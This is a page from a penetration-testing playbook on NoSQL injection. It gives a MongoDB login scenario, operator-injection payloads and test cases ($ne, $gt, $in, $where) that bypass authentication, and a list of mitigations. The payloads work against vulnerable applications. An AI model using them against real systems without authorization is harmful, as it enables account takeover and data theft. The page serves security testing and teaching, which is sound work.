PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  • Description
  • Example with Scenario
  • Payloads and Test Cases
  • Mitigation
  1. Web App Pentesting

NoSQL Injection

Description

NoSQL Injection is a type of attack that exploits vulnerabilities in NoSQL databases to inject malicious queries. This can lead to unauthorized data access, data modification, or even denial of service. Unlike SQL, NoSQL databases use various formats (e.g., JSON, BSON) and query languages, making injection techniques diverse.

Example with Scenario

Consider a web application that uses MongoDB to store user data. The application allows users to log in by querying the database with their username and password. If the input is not properly sanitized, an attacker can inject malicious NoSQL queries.

Scenario: A login form where a user inputs a username and password:

  • Input fields: username, password

  • NoSQL query (MongoDB): db.users.find({ "username": username, "password": password })

Payloads and Test Cases

Payloads

  1. Bypass Authentication (MongoDB):

    • username: {"$ne": null}

    • password: {"$ne": null}

    • This payload attempts to bypass authentication by using the $ne (not equal) operator.

  2. OR Condition Injection:

    • username: admin

    • password: {"$ne": null}

    • This payload attempts to log in as the admin user by injecting an OR condition.

  3. Boolean-based Injection:

    • username: admin

    • password: {"$gt": ""}

    • This payload attempts to authenticate by checking if the password is greater than an empty string.

  4. Exploit Array Operator:

    • username: admin

    • password: {"$in": [""]}

    • This payload attempts to authenticate by checking if the password is in a specified array.

  5. JavaScript Injection (MongoDB):

    • username: admin

    • password: {"$where": "this.password.length > 0"}

    • This payload uses the $where operator to execute JavaScript code.

Test Cases

  1. Test Case 1: Bypass with $ne Operator

    • Input:

      {
        "username": {"$ne": null},
        "password": {"$ne": null}
      }
    • Expected Result: Successful login without valid credentials.

  2. Test Case 2: OR Condition Injection

    • Input:

      {
        "username": "admin",
        "password": {"$ne": null}
      }
    • Expected Result: Login as admin user without knowing the actual password.

  3. Test Case 3: Boolean-based Injection

    • Input:

      {
        "username": "admin",
        "password": {"$gt": ""}
      }
    • Expected Result: Login as admin user without knowing the actual password.

  4. Test Case 4: Exploit Array Operator

    • Input:

      {
        "username": "admin",
        "password": {"$in": [""]}
      }
    • Expected Result: Login as admin user without knowing the actual password.

  5. Test Case 5: JavaScript Injection with $where

    • Input:

      {
        "username": "admin",
        "password": {"$where": "this.password.length > 0"}
      }
    • Expected Result: Successful login using a condition evaluated in JavaScript.

  6. Test Case 6: Empty Field Injection

    • Input:

      {
        "username": "",
        "password": {"$gt": ""}
      }
    • Expected Result: Successful login with any password.

  7. Test Case 7: Combination Injection

    • Input:

      {
        "username": {"$ne": null},
        "password": {"$in": ["", "password123"]}
      }
    • Expected Result: Successful login without valid credentials.

Mitigation

  1. Input Validation and Sanitization:

    • Validate and sanitize user inputs to ensure only expected data types and values are accepted.

    • Use allowlists to restrict input to safe values.

  2. Parameterized Queries:

    • Use parameterized queries or prepared statements to prevent injection.

  3. Escape User Inputs:

    • Properly escape all user inputs before including them in NoSQL queries.

  4. Access Controls:

    • Implement strict access controls and ensure the database account used by the application has the minimum necessary privileges.

  5. Security Testing:

    • Regularly perform security testing, including automated scans and manual penetration tests, to identify and fix potential NoSQL injection vulnerabilities.

  6. Logging and Monitoring:

    • Implement logging and monitoring mechanisms to detect and respond to suspicious activities related to NoSQL queries.

PreviousSQL InjectionNextXSS

Last updated 10 months ago